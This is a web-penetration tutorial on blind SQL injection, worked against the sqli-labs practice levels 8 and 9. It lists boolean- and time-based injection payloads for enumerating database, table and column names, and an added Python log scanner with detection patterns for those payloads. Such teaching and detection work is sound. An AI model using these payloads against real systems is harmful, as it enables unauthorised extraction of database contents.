SQL blind injection (WEB penetration)
2022-07-07 12:23:00 【hcjtn】
SQL blind injection (web penetration)
- SQL blind injection is used mainly when the web page does not display the database error in its response (that is, the error is not echoed), so the result has to be inferred indirectly.
Boolean-based blind injection
The page either returns content or returns nothing. By making the injected condition flip between these two states (a Boolean result of 0 or 1), we can infer the answer we want one bit at a time.
Steps (all of the following examples use sqli-labs less-8):
Get the length of the database name: ?id=1' and (length(database()))=8-- q (use >, < or = to narrow down the length)
Get the database name:
?id=1' and ascii(substr(database(),1,1))=115 takes 1 character starting at position 1 of the database name and returns its ASCII code as a decimal number; convert it back to a letter or symbol with an ASCII table. The first character is s.
This can also be done with Burp Suite.
Get the number of tables: ?id=1' and (select count(*) from information_schema.tables where table_schema='security')>5-- q (here the answer is =4)
Get the length of the table name: ?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)>5-- q (here =6: the name has length 6)
Get the table name: ?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101-- q The first character is e
Get the column name: ?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)))=105-- q The first character is i
Functions used in Boolean-based blind injection
- String concatenation: concat, concat_ws, group_concat
- String slicing: substr, mid, left, right, locate
- Return the ASCII code of a character: ascii, ord
- Return the character for a given ASCII code: char
- String replacement: replace
- Counting: length (string length), count (row count)
Time-based blind injection
- Time-based blind injection (using sqli-labs less-9 as the example), step by step
In level 9, the Boolean technique above gives the same response no matter what condition is entered, which shows that Boolean-based blind injection cannot be used here; try time-based blind injection instead.
Database name length: ?id=1' and if(length(database())=8,sleep(5),1)-- q (if the condition holds, the response takes about five seconds; note: the trailing 1 is only a placeholder and has no other meaning)
Database name: ?id=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first character is s
Table name: ?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q The first character is e
Column name: ?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q The first character is i
Functions used in time-based blind injection:
- sleep(n) pauses execution for n seconds
- if(expr1,expr2,expr3): if expr1 is true, expr2 is evaluated; otherwise expr3 is evaluated.
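From the defender's side, both the Boolean probes (less-8) and the timing probes (less-9) above leave recognisable traces in web-server logs. The following added example (not part of the original post) decodes the query string of constructed access-log lines and flags the payload shapes discussed above; it assumes a hypothetical log format whose last field is the response time in seconds.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the boolean- and time-based payload shapes discussed above.
BOOLEAN_PATTERNS = [
    r"\bascii\s*\(\s*substr",                 # ascii(substr(...)) character probing
    r"\blength\s*\(\s*database\s*\(\s*\)",    # length(database()) length probing
    r"information_schema\.(tables|columns)",  # schema enumeration
]
TIME_PATTERNS = [
    r"\bsleep\s*\(\s*\d+",                    # sleep(n)
    r"\bif\s*\(.*sleep\s*\(",                 # if(cond, sleep(n), ...)
]
# Hypothetical log format: client "METHOD path HTTP/x" status bytes seconds
LOG_RE = re.compile(r'^(\S+) "(GET|POST) (\S+) HTTP/1\.[01]" (\d{3}) (\d+) (\d+\.\d+)$')

def classify(line, slow_threshold=3.0):
    # Return a dict for one parsed line, or None if the line does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, path, status, _size, secs = m.groups()
    # Decode %xx and '+' so encoded payloads match the same patterns.
    query = unquote_plus(path.split("?", 1)[1]).lower() if "?" in path else ""
    hits = []
    if any(re.search(p, query) for p in BOOLEAN_PATTERNS):
        hits.append("boolean-blind")
    if any(re.search(p, query) for p in TIME_PATTERNS):
        hits.append("time-blind")
        # A sleep() payload that actually delayed the response is strong evidence.
        if float(secs) >= slow_threshold:
            hits.append("sleep-delay-observed")
    return {"client": client, "status": status, "seconds": float(secs), "hits": hits}

def scan(lines):
    # Keep only parsed entries that triggered at least one indicator.
    results = [classify(l) for l in lines]
    return [r for r in results if r and r["hits"]]

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 "GET /Less-8/?id=1 HTTP/1.1" 200 720 0.012',
    '10.0.0.9 "GET /Less-8/?id=1%27+and+(length(database()))%3D8--+q HTTP/1.1" 200 720 0.015',
    '10.0.0.9 "GET /Less-8/?id=1%27+and+ascii(substr(database(),1,1))%3D115--+q HTTP/1.1" 200 720 0.014',
    '10.0.0.9 "GET /Less-9/?id=1%27+and+if(length(database())%3D8,sleep(5),1)--+q HTTP/1.1" 200 720 5.021',
]

if __name__ == "__main__":
    for entry in scan(SAMPLE_LOG):
        print(entry["client"], entry["seconds"], entry["hits"])
```

Pattern matching on the decoded query is only a first-pass signal, since the same probes can be re-encoded or spread across parameters; correlating a sleep() payload with an unusually slow response is the more reliable indicator for time-based probing.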